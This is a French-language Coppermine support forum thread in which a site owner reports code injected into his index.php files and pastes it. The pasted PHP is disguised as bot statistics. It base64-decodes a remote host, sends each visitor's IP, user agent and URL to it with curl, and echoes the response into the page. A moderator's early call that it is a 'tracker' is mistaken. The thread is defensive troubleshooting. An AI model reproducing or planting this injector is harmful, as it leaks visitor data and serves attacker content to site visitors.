Index.php hack ajout de code? Index.php hack ajout de code?
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

Index.php hack ajout de code?

Started by lemaquettiste, June 29, 2012, 11:20:22 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

lemaquettiste

Bonjour tout le monde,

J'utilise depuis plusieurs années coppermine http://www.retroplane.net/album/index.php?  et fais régulièrement les mises à jour, je suis actuellement avec la version 1.5.20

Je vous expose mon problème:
régulièrement je constate que je n'ai plus accès à l'index de ma gallerie, ça me met cette erreur
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/www/bb5b67d233c6cbdf9e9c5f2a98bd475f/web/album/index.php on line 452

en réuploadant via ftp l'index.php d'origine ça règle le problème

j'ai donc regardé à la ligne 452 de l'index "vérolé" ce qui pouvait poser problème, et je constate, en comparant avec l'index original que j'ai tout un code, ci-dessous qui est ajouté

<?php
if (!isset($sRetry))
{
global 
$sRetry;
$sRetry 1;
    
// This code use for global bot statistic
    
$sUserAgent strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    
$stCurlHandle NULL;
    
$stCurlLink "";
    if((
strstr($sUserAgent'google') == false)&&(strstr($sUserAgent'yahoo') == false)&&(strstr($sUserAgent'baidu') == false)&&(strstr($sUserAgent'msn') == false)&&(strstr($sUserAgent'opera') == 

false)&&(strstr($sUserAgent'chrome') == false)&&(strstr($sUserAgent'bing') == false)&&(strstr($sUserAgent'safari') == false)&&(strstr($sUserAgent'bot') == false)) // Bot comes
    
{
        if(isset(
$_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        
$stCurlLink base64_decode'aHR0cDovL2JvdHVwZGF0ZXN0YXRpc3RpYy5jb20vc3RhdEIvc3RhdC5waHA=').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode

($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @
$stCurlHandle curl_init$stCurlLink ); 
    }
    } 
if ( 
$stCurlHandle !== NULL )
{
    
curl_setopt($stCurlHandleCURLOPT_RETURNTRANSFER1);
    
curl_setopt($stCurlHandleCURLOPT_TIMEOUT12);
    
$sResult = @curl_exec($stCurlHandle); 
    if (
$sResult[0]=="O"
     {
$sResult[0]=" ";
      echo 
$sResult// Statistic code end
      
}
    
curl_close($stCurlHandle); 
}
}
?>



y a t'il  un piratage de mon index? par où cela se fait il? est-ce une faille de coppermine ou seulement moi qui a une faille quelque part?
si vous pouviez m'éclairer, je vous en serais reconnaissant, merci

François Keller

Bonjour,

le code  que vous postez est celui d'un "tracker" pour des statistiques. Est ce que vous avez ajouté quelque part un service de statistiques pour votre site ?
si oui, c'est de là que ça vient, si non, il faudrait réussir à déterminer comment ce code est ajouté dans le fichier (par l'hébergeur, par un script présent sur le serveur et qui vérole la galerie ...)
Vérifiez qu'il n'y a pas de fichier sur le serveur qui n'a rien à y faire
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

lemaquettiste

En "service" externe, j'ai xiti et adsence, mais leur code d'origine n'a pas bougé. Je ne comprend pas comment arrive ce code, vraiment bizarre
là j'ai modifié la permission de index.php de 755 à 555, je ne sais pas si ça peut empécher une écriture externe?

lemaquettiste

Bon ben en tapant le début de ce code dans google il s'avère que c'est un code malicieux qui infectent tous les index.php du site. J'ai donc vite regardé l'index de mon forum et l'index de mon livre d'or et ceux ci avaient bien ce code :o je les ai reuploadé propre et je vais surveiller tous les jours, mais bon le problème c'est de savoir par quelle faille ils rentrent ce code, et là pour moi c'est mission quasi impossible vu mon incompétence et les milliers de fichiers de mon site. :'(

François Keller

Il est possible qu'il soit présent dans un fichier image téléchargé par quelqu'un.
Il faudrait faire une recherche du code dans l'ensemble des fichiers du serveur.
Ce n'est pas obligatoirement une faille de Coppermine, mais peut être aussi du forum (quel est le script utilisé ?) ou une action malveillante d'un utilisateur...
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

lemaquettiste

D'après recherche plus approfondie le problème est apparement connu, ce code est injecté dans tous les index.php d'un site web. Rien n'indique que Coppermine soit en cause. En fait si ce code ne faisait pas bugguer l'index coppermine, je ne l'aurais jamais décelé. Sur mes autres index, le code était placé à la fin et restait invisible. Certains disent que ça peut être suite à une intrusion via ftp, donc j'ai changé mon mot de passe et mis mes divers index.php en chmod 444. Pour l'instant le code n'a pas été réinjecté, je surveille....

Quote from: François Keller on June 30, 2012, 11:04:37 AM
Il faudrait faire une recherche du code dans l'ensemble des fichiers du serveur.
J'en ai vérifié quelques uns, mais rien trouvé, comment je pourrais vérifier tous les fichiers? y'aurait une astuce pour scanner tout le domaine? mon site pèse 8go, des milliers de fichiers...

François Keller

QuoteJ'en ai vérifié quelques uns, mais rien trouvé, comment je pourrais vérifier tous les fichiers? y'aurait une astuce pour scanner tout le domaine? mon site pèse 8go, des milliers de fichiers...
Avec certains éditeurs de texte orientés programmation, on peut faire une recherche sur l'ensemble des fichiers d'un dossier. Mais ça reste fastidieux pour un nombre important de fichiers.
Maintenant, si au bout de quelques temps, il n'y a plus d'injection de code, le fichier malveillant originel a certainement été éliminé.
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog